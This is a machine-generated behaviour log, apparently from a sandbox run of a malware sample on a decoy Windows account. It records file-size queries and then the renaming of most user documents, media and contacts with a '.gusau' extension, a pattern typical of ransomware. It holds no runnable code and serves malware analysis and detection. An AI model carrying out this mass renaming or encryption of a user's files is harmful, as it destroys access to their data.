Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\MKQEfW1 O9_GGct.avi type = size, size_out = 55046 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\PVK83zEhiJoptl7F1vB.avi type = size, size_out = 28472 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\xSTCc.avi type = size, size_out = 39577 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Adobe\Acrobat\10.0\rdrmessage.zip type = size, size_out = 42495 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\index.dat type = size, size_out = 32768 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.cab type = size, size_out = 581730 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.msi type = size, size_out = 185344 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\Deployment\deployment.properties type = size, size_out = 719 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\Data1.cab type = size, size_out = 25340970 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\jre1.7.0_45.msi type = size, size_out = 906752 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\xbwc4aSxlyVVrqHkiS\E31COVq.mkv type = size, size_out = 67715 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\xbwc4aSxlyVVrqHkiS\QDp9.mp4 type = size, size_out = 46303 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\sVLD8M-oJOW\xbwc4aSxlyVVrqHkiS\utbmN6bsL1s2QoyIy_N.mp4 type = size, size_out = 39488 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\bjmnfbrNfGEXCMraZ.flv type = size, size_out = 56325 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\Djmg5Xg.flv type = size, size_out = 14314 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\pW-HWPux0H.flv type = size, size_out = 27229 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\UMlO p8XR.mp4 type = size, size_out = 64311 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\36USA68T\imagesrv.adition[1].xml type = size, size_out = 13 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\3O75JDME\www.google[1].xml type = size, size_out = 13 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\VGMTOI09\www.msn[1].xml type = size, size_out = 836 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\6xgwVggB1\3-Nhyh1JijVqK571B0JU\I0IPALQTs_bmOEuFUuOl.avi type = size, size_out = 41857 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\6xgwVggB1\3-Nhyh1JijVqK571B0JU\Imq8H_txUYezfovf910P.avi type = size, size_out = 13559 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\6xgwVggB1\3-Nhyh1JijVqK571B0JU\PSRUTQvyeJCY.mp4 type = size, size_out = 89099 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\6xgwVggB1\3-Nhyh1JijVqK571B0JU\rbkgNDQN9sYCu5S0K.flv type = size, size_out = 83040 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\6xgwVggB1\3-Nhyh1JijVqK571B0JU\ZPlP3lZcQ.flv type = size, size_out = 49730 True 1
Fn
Get Info C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\muLwtSyMNArdmekL\tKB6e7CXHXIzSLY\4Ww3Dv\6xgwVggB1\3-Nhyh1JijVqK571B0JU\_eu6q3E zyK.mp4 type = size, size_out = 23819 True 1
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Aclviho ASldjfl.contact.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Aclviho ASldjfl.contact True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Administrator.contact.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Administrator.contact True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\asdlfk poopvy.contact.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\asdlfk poopvy.contact True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\chucu jadnvk.contact.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\chucu jadnvk.contact True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\lulcit amkdfe.contact.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\lulcit amkdfe.contact True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cPHmz4y9hlXd6trOnGz.ots.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cPHmz4y9hlXd6trOnGz.ots True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\dSfwXCkwSPKl-.avi.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\dSfwXCkwSPKl-.avi True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EDVS.avi.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EDVS.avi True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\frVUZwt9PcEpwFw.jpg.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\frVUZwt9PcEpwFw.jpg True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\G0k7.m4a.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\G0k7.m4a True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\GH F.mp3.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\GH F.mp3 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Gp40F.mp3.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Gp40F.mp3 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\h7iN.jpg.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\h7iN.jpg True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\IcgE7 x.mp3.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\IcgE7 x.mp3 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\K0eRKbFqwJi63h.flv.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\K0eRKbFqwJi63h.flv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\KaYNqgG.bmp.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\KaYNqgG.bmp True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\LS_APPDATA744de46e-2913-4f69-a0ea-d12dff2a5c90SAMPLE.exe.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\LS_APPDATA744de46e-2913-4f69-a0ea-d12dff2a5c90SAMPLE.exe True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Ntzf.doc.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Ntzf.doc True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Pjxm0.mp3.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Pjxm0.mp3 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\sDwPUwZG7wDgXptt.flv.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\sDwPUwZG7wDgXptt.flv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\uJu-CI.mp3.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\uJu-CI.mp3 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\uZ7jTVGLo.pdf.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\uZ7jTVGLo.pdf True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\vDgHCp4Eu83i9SpY9-10.m4a.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\vDgHCp4Eu83i9SpY9-10.m4a True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wmwdI-cLzMW1U.rtf.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wmwdI-cLzMW1U.rtf True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\xZVVdLTP5CRjDGwK.mp3.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\xZVVdLTP5CRjDGwK.mp3 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\_pjDf89YoIOK7INngcQL.swf.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\_pjDf89YoIOK7INngcQL.swf True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\13WDFkzLx13VDvEaH0D.pptx.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\13WDFkzLx13VDvEaH0D.pptx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\4Q Yden1pX.xls.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\4Q Yden1pX.xls True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\4zo3jZ4ZhCJWz.doc.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\4zo3jZ4ZhCJWz.doc True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\7SVXau9BM-qAm.docx.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\7SVXau9BM-qAm.docx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\8OcrQfqf9.xlsx.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\8OcrQfqf9.xlsx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\aHQ0mStm7MOUQz8p.csv.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\aHQ0mStm7MOUQz8p.csv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c74ORtbzoKEgt1tULZrF.ots.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c74ORtbzoKEgt1tULZrF.ots True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Eiz2OkszASes0dl.ods.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Eiz2OkszASes0dl.ods True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\G5QwtEl2iSslGa.ots.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\G5QwtEl2iSslGa.ots True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ixHgNpSkmetkMwk0N.doc.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ixHgNpSkmetkMwk0N.doc True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\jLUC 3.docx.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\jLUC 3.docx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mMGsDdpRxCcIwjb.pptx.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mMGsDdpRxCcIwjb.pptx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mXYQzNZWY3_pbSh7dVoS.xlsx.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mXYQzNZWY3_pbSh7dVoS.xlsx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\rOeN9J2zJO_02nt1ly.docx.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\rOeN9J2zJO_02nt1ly.docx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\rrn5_p.docx.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\rrn5_p.docx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Sh2l9d6EAI4aRt7OOr6g.pptx.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Sh2l9d6EAI4aRt7OOr6g.pptx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\tJLm4JiczASJ_8Z0U3i.ots.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\tJLm4JiczASJ_8Z0U3i.ots True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\uJO-YiH9NhpREYVYgJi.xlsx.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\uJO-YiH9NhpREYVYgJi.xlsx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\VJH-kfHp7SFpre94.pptx.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\VJH-kfHp7SFpre94.pptx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\wZOz3j2ll6HfOuxlg93b.docx.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\wZOz3j2ll6HfOuxlg93b.docx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\x7bIgakKt.docx.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\x7bIgakKt.docx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\XhDBm5L_.xlsx.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\XhDBm5L_.xlsx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yB0OOX Rk5q.pptx.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yB0OOX Rk5q.pptx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\_7Xr5yfzUYNnPcQwSd50.xlsx.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\_7Xr5yfzUYNnPcQwSd50.xlsx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\-GcGxMxOZK4.m4a.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\-GcGxMxOZK4.m4a True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\07G0ZL7bvnBKvt7n.mp3.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\07G0ZL7bvnBKvt7n.mp3 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\1tk99aXbfw9RlvqZV.mp3.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\1tk99aXbfw9RlvqZV.mp3 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\8HrfWqZar65w.wav.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\8HrfWqZar65w.wav True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\bS4AaW9eUKRKSJX2c.m4a.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\bS4AaW9eUKRKSJX2c.m4a True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\eySD-sWxKcR.m4a.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\eySD-sWxKcR.m4a True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\FB pP.m4a.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\FB pP.m4a True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\FC0AY.wav.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\FC0AY.wav True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\FiSO1uvHs5.wav.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\FiSO1uvHs5.wav True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\fQh6.wav.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\fQh6.wav True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\g9mcoi9dYhMEy.m4a.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\g9mcoi9dYhMEy.m4a True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\H94nos6VqWF8Oqje.m4a.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\H94nos6VqWF8Oqje.m4a True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\H99vbmXS7JVu8GvPT.mp3.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\H99vbmXS7JVu8GvPT.mp3 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\hf0MR7KC2v0S0EFbF.mp3.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\hf0MR7KC2v0S0EFbF.mp3 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\j nRVt1oLEKKj.m4a.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\j nRVt1oLEKKj.m4a True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\jgXL.wav.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\jgXL.wav True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\MyJjOnayKnFCwyo3.m4a.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\MyJjOnayKnFCwyo3.m4a True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\nh7G7MoNq.wav.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\nh7G7MoNq.wav True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\NTjyCO-pmQ3AS.mp3.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\NTjyCO-pmQ3AS.mp3 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\O841-zc0Cz.m4a.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\O841-zc0Cz.m4a True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\PBGnAJbjKeNYoVmuXsp.wav.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\PBGnAJbjKeNYoVmuXsp.wav True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\POR XU-fcmkfoFYhwpS_.mp3.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\POR XU-fcmkfoFYhwpS_.mp3 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\ptcryHpXY3gBNb.m4a.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\ptcryHpXY3gBNb.m4a True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\qpbO.wav.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\qpbO.wav True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\S4IWsPZvnadFRmzK.mp3.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\S4IWsPZvnadFRmzK.mp3 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\SIP IIj4TyP2E.mp3.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\SIP IIj4TyP2E.mp3 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\SOIg.mp3.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\SOIg.mp3 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\SpwIY0qQ5DxtnlG-Nb.m4a.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\SpwIY0qQ5DxtnlG-Nb.m4a True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\th0xZ3rZW1yj.m4a.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\th0xZ3rZW1yj.m4a True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\unP_Med.m4a.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\unP_Med.m4a True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\wcuQuzjX.wav.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\wcuQuzjX.wav True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\WqT6i1.m4a.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\WqT6i1.m4a True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\y9xtUA5iI6IPOKUD.wav.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\y9xtUA5iI6IPOKUD.wav True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\Z3UK3vFO8h-zCs4j.mp3.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\Z3UK3vFO8h-zCs4j.mp3 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\ZBi4Ka.wav.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\ZBi4Ka.wav True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\zyzE7.m4a.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\zyzE7.m4a True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Music\_wiR1L3MR2ebfVeG.mp3.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\_wiR1L3MR2ebfVeG.mp3 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\3vMt_2q3fAah.png.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\3vMt_2q3fAah.png True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\CrjCu6i aZorUJcYh.png.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\CrjCu6i aZorUJcYh.png True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\IblMdY4N1yG.bmp.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\IblMdY4N1yG.bmp True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\eFGyeqngF0yupS6aQiTk.mkv.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\eFGyeqngF0yupS6aQiTk.mkv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Videos\HuEJMg3KiSp.avi.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\HuEJMg3KiSp.avi True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\0JOcjFAlZN.flv.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\0JOcjFAlZN.flv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\7H07rLnEi4jFThR2aq.mp4.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\7H07rLnEi4jFThR2aq.mp4 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\ceQR-g1K.flv.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\ceQR-g1K.flv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Gtis3rDzqOHJLSemRMN.odp.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Gtis3rDzqOHJLSemRMN.odp True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\hjjmc6wvdBzNble_jQ.m4a.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\hjjmc6wvdBzNble_jQ.m4a True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\IqxOJCjnMrxHR71kHDep.mp3.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\IqxOJCjnMrxHR71kHDep.mp3 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\KMX9gyhiVByA4.mp4.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\KMX9gyhiVByA4.mp4 True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\rX Jr.png.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\rX Jr.png True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\sKevCgi1Mzg9JDdGUMsM.flv.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\sKevCgi1Mzg9JDdGUMsM.flv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\0d9kggXW.pdf.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\0d9kggXW.pdf True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\aFuREbY291J9.rtf.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\aFuREbY291J9.rtf True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\bhC_ABvBjR.ods.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\bhC_ABvBjR.ods True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\hK5LQd-AxtZKvzbn.xlsx.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\hK5LQd-AxtZKvzbn.xlsx True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\lbsR.csv.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\lbsR.csv True 1
Fn
Move C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\mdkvH5k.csv.gusau source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\mdkvH5k.csv True 1
Fn
